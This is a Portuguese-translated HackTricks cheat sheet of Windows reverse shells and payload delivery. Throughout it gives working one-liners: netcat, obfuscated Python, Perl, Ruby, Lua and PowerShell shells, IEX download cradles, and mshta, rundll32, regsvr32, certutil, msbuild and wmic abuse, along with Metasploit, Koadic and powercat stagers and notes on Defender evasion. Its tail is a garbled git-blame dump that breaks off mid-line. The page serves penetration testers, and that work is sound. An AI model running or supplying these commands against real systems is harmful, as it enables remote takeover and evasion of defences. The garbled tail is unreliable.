hacktricks/generic-methodologies-and-resources/shells/windows.md

# Shells - Windows

<details>

<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Outras maneiras de apoiar o HackTricks:

* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.

</details>

<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>

Encontre vulnerabilidades que mais importam para que você possa corrigi-las mais rapidamente. O Intruder rastreia sua superfície de ataque, executa varreduras proativas de ameaças, encontra problemas em toda a sua pilha tecnológica, de APIs a aplicativos da web e sistemas em nuvem. [**Experimente gratuitamente**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) hoje.

{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}

***

## Lolbas

A página [lolbas-project.github.io](https://lolbas-project.github.io/) é para Windows, assim como [https://gtfobins.github.io/](https://gtfobins.github.io/) é para Linux.\
Obviamente, **não existem arquivos SUID ou privilégios sudo no Windows**, mas é útil saber **como** alguns **binários** podem ser (mal)usados para realizar algum tipo de ação inesperada como **executar código arbitrário.**

## NC
```bash
nc.exe -e cmd.exe <Attacker_IP> <PORT>
```
## SBD

**sbd** é um clone do Netcat, projetado para ser portátil e oferecer criptografia forte. Ele roda em sistemas operacionais semelhantes ao Unix e no Microsoft Win32. sbd apresenta criptografia AES-CBC-128 + HMAC-SHA1 (por Christophe Devine), execução de programas (opção -e), escolha de porta de origem, reconexão contínua com atraso e algumas outras funcionalidades interessantes. sbd suporta apenas comunicação TCP/IP. sbd.exe (parte da distribuição Kali Linux: /usr/share/windows-resources/sbd/sbd.exe) pode ser enviado para um computador com Windows como uma alternativa ao Netcat.

## Python
```bash
#Windows
C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.11.0.37', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))"
```
## Perl

Perl é uma linguagem de programação amplamente utilizada em hacking e pentesting devido à sua capacidade de executar comandos do sistema operacional e interagir com arquivos de forma eficiente. É comum ver scripts Perl sendo usados para criar backdoors e shells em sistemas Windows comprometidos.
```bash
perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
```
## Ruby
```bash
#Windows
ruby -rsocket -e 'c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
```
## Lua
```bash
lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
```
## OpenSSH

Atacante (Kali)
```bash
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Generate certificate
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port> #Here you will be able to introduce the commands
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port2> #Here yo will be able to get the response
```
Vítima
```bash
#Linux
openssl s_client -quiet -connect <ATTACKER_IP>:<PORT1>|/bin/bash|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>

#Windows
openssl.exe s_client -quiet -connect <ATTACKER_IP>:<PORT1>|cmd.exe|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>
```
## Powershell
```bash
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.2.0.5/shell.ps1')|iex"
powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/ipw.ps1')"
Start-Process -NoNewWindow powershell "IEX(New-Object Net.WebClient).downloadString('http://10.222.0.26:8000/ipst.ps1')"
echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile
```
Processo realizando chamada de rede: **powershell.exe**\
Carga gravada no disco: **NÃO** (_pelo menos em nenhum lugar que eu pudesse encontrar usando o procmon!_)
```bash
powershell -exec bypass -f \\webdavserver\folder\payload.ps1
```
Processo realizando chamada de rede: **svchost.exe**\
Carga gravada no disco: **cache local do cliente WebDAV**
```bash
$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
```
**Obtenha mais informações sobre diferentes Shells do Powershell no final deste documento**

## Mshta
```bash
mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))
```
Processo realizando chamada de rede: **mshta.exe**\
Carga útil escrita no disco: **cache local do IE**
```bash
mshta http://webserver/payload.hta
```
Processo realizando chamada de rede: **mshta.exe**\
Carga útil escrita no disco: **cache local do IE**
```bash
mshta \\webdavserver\folder\payload.hta
```
Processo realizando chamada de rede: **svchost.exe**\
Carga escrita no disco: **cache local do cliente WebDAV**

#### **Exemplo de shell reverso hta-psh (usa hta para baixar e executar backdoor PS)**
```markup
<scRipt language="VBscRipT">CreateObject("WscrIpt.SheLL").Run "powershell -ep bypass -w hidden IEX (New-ObjEct System.Net.Webclient).DownloadString('http://119.91.129.12:8080/1.ps1')"</scRipt>
```
**Você pode baixar e executar muito facilmente um zombie Koadic usando o stager hta**

#### Exemplo hta

[**Daqui**](https://gist.github.com/Arno0x/91388c94313b70a9819088ddf760683f)
```markup
<html>
<head>
<HTA:APPLICATION ID="HelloExample">
<script language="jscript">
var c = "cmd.exe /c calc.exe";
new ActiveXObject('WScript.Shell').Run(c);
</script>
</head>
<body>
<script>self.close();</script>
</body>
</html>
```
#### **mshta - sct**

[**Daqui**](https://gist.github.com/Arno0x/e472f58f3f9c8c0c941c83c58f254e17)
```markup
<?XML version="1.0"?>
<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close();  -->
<!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) -->
<!-- mshta vbscript:Close(Execute("GetObject(""script:C:\local\path\scriptlet.sct"")")) -->
<scriptlet>
<public>
</public>
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</scriptlet>
```
#### **Mshta - Metasploit**
```bash
use exploit/windows/misc/hta_server
msf exploit(windows/misc/hta_server) > set srvhost 192.168.1.109
msf exploit(windows/misc/hta_server) > set lhost 192.168.1.109
msf exploit(windows/misc/hta_server) > exploit
```

```bash
Victim> mshta.exe //192.168.1.109:8080/5EEiDSd70ET0k.hta #The file name is given in the output of metasploit
```
**Detectado pelo defensor**

## **Rundll32**

[**Exemplo de Dll olá mundo**](https://github.com/carterjones/hello-world-dll)
```bash
rundll32 \\webdavserver\folder\payload.dll,entrypoint
```
Processo realizando chamada de rede: **svchost.exe**\
Carga gravada no disco: **cache local do cliente WebDAV**
```bash
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();
```
Processo realizando chamada de rede: **rundll32.exe**\
Carga gravada no disco: **cache local do IE**

**Detectado pelo defensor**

**Rundll32 - sct**

[**Daqui**](https://gist.github.com/Arno0x/e472f58f3f9c8c0c941c83c58f254e17)
```bash
<?XML version="1.0"?>
<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close();  -->
<!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) -->
<scriptlet>
<public>
</public>
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</scriptlet>
```
#### **Rundll32 - Metasploit**
```bash
use windows/smb/smb_delivery
run
#You will be given the command to run in the victim: rundll32.exe \\10.2.0.5\Iwvc\test.dll,0
```
**Rundll32 - Koadic**
```bash
use stager/js/rundll32_js
set SRVHOST 192.168.1.107
set ENDPOINT sales
run
#Koadic will tell you what you need to execute inside the victim, it will be something like:
rundll32.exe javascript:"\..\mshtml, RunHTMLApplication ";x=new%20ActiveXObject("Msxml2.ServerXMLHTTP.6.0");x.open("GET","http://10.2.0.5:9997/ownmG",false);x.send();eval(x.responseText);window.close();
```
## Regsvr32
```bash
regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll
```
Processo realizando chamada de rede: **regsvr32.exe**\
Carga gravada no disco: **cache local do IE**
```
regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll
```
Processo realizando chamada de rede: **svchost.exe**\
Carga gravada no disco: **cache local do cliente WebDAV**

**Detectado pelo defensor**

#### Regsvr32 -sct

[**Daqui**](https://gist.github.com/Arno0x/81a8b43ac386edb7b437fe1408b15da1)
```markup
<?XML version="1.0"?>
<!-- regsvr32 /u /n /s /i:http://webserver/regsvr32.sct scrobj.dll -->
<!-- regsvr32 /u /n /s /i:\\webdavserver\folder\regsvr32.sct scrobj.dll -->
<scriptlet>
<registration
progid="PoC"
classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</registration>
</scriptlet>
```
#### **Regsvr32 - Metasploit**
```bash
use multi/script/web_delivery
set target 3
set payload windows/meterpreter/reverse/tcp
set lhost 10.2.0.5
run
#You will be given the command to run in the victim: regsvr32 /s /n /u /i:http://10.2.0.5:8080/82j8mC8JBblt.sct scrobj.dll
```
**Você pode baixar e executar facilmente um zombie Koadic usando o stager regsvr**

## Certutil

Baixe um B64dll, decodifique e execute.
```bash
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll
```
Baixe um B64exe, decodifique e execute-o.
```bash
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe
```
**Detectado pelo defensor**


<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>

Encontre vulnerabilidades que são mais importantes para que você possa corrigi-las mais rapidamente. O Intruder rastreia sua superfície de ataque, executa varreduras proativas de ameaças, encontra problemas em toda a sua pilha tecnológica, desde APIs até aplicativos da web e sistemas em nuvem. [**Experimente gratuitamente**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) hoje.

{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}

***

## **Cscript/Wscript**
```bash
powershell.exe -c "(New-Object System.NET.WebClient).DownloadFile('http://10.2.0.5:8000/reverse_shell.vbs',\"$env:temp\test.vbs\");Start-Process %windir%\system32\cscript.exe \"$env:temp\test.vbs\""
```
**Cscript - Metasploit**
```bash
msfvenom -p cmd/windows/reverse_powershell lhost=10.2.0.5 lport=4444 -f vbs > shell.vbs
```
**Detectado pelo defensor**

## PS-Bat
```bash
\\webdavserver\folder\batchfile.bat
```
Processo realizando chamada de rede: **svchost.exe**\
Carga gravada no disco: **cache local do cliente WebDAV**
```bash
msfvenom -p cmd/windows/reverse_powershell lhost=10.2.0.5 lport=4444 > shell.bat
impacket-smbserver -smb2support kali `pwd`
```

```bash
\\10.8.0.3\kali\shell.bat
```
**Detectado pelo defensor**

## **MSIExec**

Atacante
```
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.2.0.5 lport=1234 -f msi > shell.msi
python -m SimpleHTTPServer 80
```
Vítima:
```
victim> msiexec /quiet /i \\10.2.0.5\kali\shell.msi
```
**Detectado**

## **Wmic**
```
wmic os get /format:"https://webserver/payload.xsl"
```
Processo realizando chamada de rede: **wmic.exe**\
Carga gravada no disco: **cache local do IE**

Exemplo de arquivo xsl [aqui](https://gist.github.com/Arno0x/fa7eb036f6f45333be2d6d2fd075d6a7):
```
<?xml version='1.0'?>
<stylesheet xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:user="placeholder" version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe /c echo IEX(New-Object Net.WebClient).DownloadString('http://10.2.0.5/shell.ps1') | powershell -noprofile -");
]]>
</ms:script>
</stylesheet>
```
**Não detectado**

**Você pode baixar e executar muito facilmente um zumbi Koadic usando o stager wmic**

## Msbuild
```
cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml"
```
Processo realizando chamada de rede: **svchost.exe**\
Payload escrito no disco: **cache local do cliente WebDAV**

Você pode usar essa técnica para burlar a Lista Branca de Aplicativos e as restrições do Powershell.exe. Pois você será solicitado com um shell do PS.\
Basta baixar e executar isso: [https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj](https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj)
```
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildShell.csproj
```
**Não detectado**

## **CSC**

Compilar código C# na máquina da vítima.
```
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:shell.exe shell.cs
```
Pode baixar um shell reverso básico em C# aqui: [https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc](https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc)

**Não detectado**

## **Regasm/Regsvc**
```
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll
```
Processo realizando chamada de rede: **svchost.exe**\
Payload escrito no disco: **cache local do cliente WebDAV**

**Eu não tentei**

[**https://gist.github.com/Arno0x/71ea3afb412ec1a5490c657e58449182**](https://gist.github.com/Arno0x/71ea3afb412ec1a5490c657e58449182)

## Odbcconf
```
odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}
```
Processo realizando chamada de rede: **svchost.exe**\
Carga escrita no disco: **cache local do cliente WebDAV**

**Eu não tentei**

[**https://gist.github.com/Arno0x/45043f0676a55baf484cbcd080bbf7c2**](https://gist.github.com/Arno0x/45043f0676a55baf484cbcd080bbf7c2)

## Shells do Powershell

### PS-Nishang

[https://github.com/samratashok/nishang](https://github.com/samratashok/nishang)

Na pasta **Shells**, existem vários shells diferentes. Para baixar e executar o Invoke-_PowerShellTcp.ps1_ faça uma cópia do script e adicione ao final do arquivo:
```
Invoke-PowerShellTcp -Reverse -IPAddress 10.2.0.5 -Port 4444
```
Comece a servir o script em um servidor web e execute-o no final da vítima:
```
powershell -exec bypass -c "iwr('http://10.11.0.134/shell2.ps1')|iex"
```
Defender ainda não o detecta como código malicioso (ainda, 3/04/2019).

**TODO: Verificar outros shells do nishang**

### **PS-Powercat**

[**https://github.com/besimorhino/powercat**](https://github.com/besimorhino/powercat)

Baixe, inicie um servidor web, inicie o ouvinte e execute no lado da vítima:
```
powershell -exec bypass -c "iwr('http://10.2.0.5/powercat.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd"
```
Defender ainda não o detecta como código malicioso (ainda, 3/04/2019).

**Outras opções oferecidas pelo powercat:**

Conexão de shell, Shell reverso (TCP, UDP, DNS), Redirecionamento de porta, upload/download, Gerar payloads, Servir arquivos...
```
Serve a cmd Shell:
powercat -l -p 443 -e cmd
Send a cmd Shell:
powercat -c 10.1.1.1 -p 443 -e cmd
Send a powershell:
powercat -c 10.1.1.1 -p 443 -ep
Send a powershell UDP:
powercat -c 10.1.1.1 -p 443 -ep -u
TCP Listener to TCP Client Relay:
powercat -l -p 8000 -r tcp:10.1.1.16:443
Generate a reverse tcp payload which connects back to 10.1.1.15 port 443:
powercat -c 10.1.1.15 -p 443 -e cmd -g
Start A Persistent Server That Serves a File:
powercat -l -p 443 -i C:\inputfile -rep
```
### Empire

[https://github.com/EmpireProject/Empire](https://github.com/EmpireProject/Empire)

Crie um iniciador powershell, salve-o em um arquivo e faça o download e execute-o.
```
powershell -exec bypass -c "iwr('http://10.2.0.5/launcher.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd"
```
**Detectado como código malicioso**

### MSF-Unicorn

[https://github.com/trustedsec/unicorn](https://github.com/trustedsec/unicorn)

Crie uma versão em powershell de uma backdoor do metasploit usando o unicorn
```
python unicorn.py windows/meterpreter/reverse_https 10.2.0.5 443
```
Inicie o msfconsole com o recurso criado:
```
msfconsole -r unicorn.rc
```
Inicie um servidor web servindo o arquivo _powershell\_attack.txt_ e execute no alvo:
```
powershell -exec bypass -c "iwr('http://10.2.0.5/powershell_attack.txt')|iex"
```
**Detectado como código malicioso**

## Mais

[PS>Attack](https://github.com/jaredhaight/PSAttack) Console PS com alguns módulos ofensivos PS pré-carregados (cifrado)\
[https://gist.github.com/NickTyrer/92344766f1d4d48b15687e5e4bf6f9](https://gist.github.com/NickTyrer/92344766f1d4d48b15687e5e4bf6f93c)[\
WinPWN](https://github.com/SecureThisShit/WinPwn) Console PS com alguns módulos ofensivos PS e detecção de proxy (IEX)

## Bibliografia

* [https://highon.coffee/blog/reverse-shell-cheat-sheet/](https://highon.coffee/blog/reverse-shell-cheat-sheet/)
* [https://gist.github.com/Arno0x](https://gist.github.com/Arno0x)
* [https://github.com/GreatSCT/GreatSCT](https://github.com/GreatSCT/GreatSCT)
* [https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/](https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/)
* [https://www.hackingarticles.in/koadic-com-command-control-framework/](https://www.hackingarticles.in/koadic-com-command-control-framework/)
* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md)


<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>

Encontre vulnerabilidades que mais importam para que você possa corrigi-las mais rapidamente. O Intruder rastreia sua superfície de ataque, executa varreduras proativas de ameaças, encontra problemas em toda a sua pilha tecnológica, de APIs a aplicativos da web e sistemas em nuvem. [**Experimente gratuitamente**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) hoje.

{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}


<details>

<summary><strong>Aprenda hacking na AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Outras maneiras de apoiar o HackTricks:

* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe seus truques de hacking enviando PRs para o** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
-												GitBook: [#3633] No subject

											
										
										
											2022-10-27 23:22:18 +00:00
+								# Shells - Windows
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								<details>
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:45:11 +00:00
+								<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:45:11 +00:00
+								Outras maneiras de apoiar o HackTricks:
-												Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene

											
										
										
											2023-12-30 22:28:51 +00:00
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:45:11 +00:00
+								* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
 								* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
 								* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
 								* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
 								* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												GitBook: [#3633] No subject

											
										
										
											2022-10-27 23:22:18 +00:00
+								</details>
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene

											
										
										
											2023-09-03 01:19:04 +00:00
+								<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:45:11 +00:00
+								Encontre vulnerabilidades que mais importam para que você possa corrigi-las mais rapidamente. O Intruder rastreia sua superfície de ataque, executa varreduras proativas de ameaças, encontra problemas em toda a sua pilha tecnológica, de APIs a aplicativos da web e sistemas em nuvem. [**Experimente gratuitamente**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) hoje.
-												hp

											
										
										
											2023-02-27 09:28:45 +00:00
-												Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene

											
										
										
											2023-09-03 01:19:04 +00:00
+								{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
-												hp

											
										
										
											2023-02-27 09:28:45 +00:00
-												Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene

											
										
										
											2023-09-03 01:19:04 +00:00
+								***
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												GitBook: [#3633] No subject

											
										
										
											2022-10-27 23:22:18 +00:00
+								## Lolbas
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:45:11 +00:00
+								A página [lolbas-project.github.io](https://lolbas-project.github.io/) é para Windows, assim como [https://gtfobins.github.io/](https://gtfobins.github.io/) é para Linux.\
 								Obviamente, **não existem arquivos SUID ou privilégios sudo no Windows**, mas é útil saber **como** alguns **binários** podem ser (mal)usados para realizar algum tipo de ação inesperada como **executar código arbitrário.**
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												GitBook: [#3633] No subject

											
										
										
											2022-10-27 23:22:18 +00:00
+								## NC
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```bash
 								nc.exe -e cmd.exe <Attacker_IP> <PORT>
 								```
-												GitBook: [#3633] No subject

											
										
										
											2022-10-27 23:22:18 +00:00
+								## SBD
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:45:11 +00:00
+								**sbd** é um clone do Netcat, projetado para ser portátil e oferecer criptografia forte. Ele roda em sistemas operacionais semelhantes ao Unix e no Microsoft Win32. sbd apresenta criptografia AES-CBC-128 + HMAC-SHA1 (por Christophe Devine), execução de programas (opção -e), escolha de porta de origem, reconexão contínua com atraso e algumas outras funcionalidades interessantes. sbd suporta apenas comunicação TCP/IP. sbd.exe (parte da distribuição Kali Linux: /usr/share/windows-resources/sbd/sbd.exe) pode ser enviado para um computador com Windows como uma alternativa ao Netcat.
-												Translated ['generic-methodologies-and-resources/shells/windows.md', 'ma

											
										
										
											2023-07-13 10:23:45 +00:00
 								## Python
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```bash
 								#Windows
 								C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.11.0.37', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else 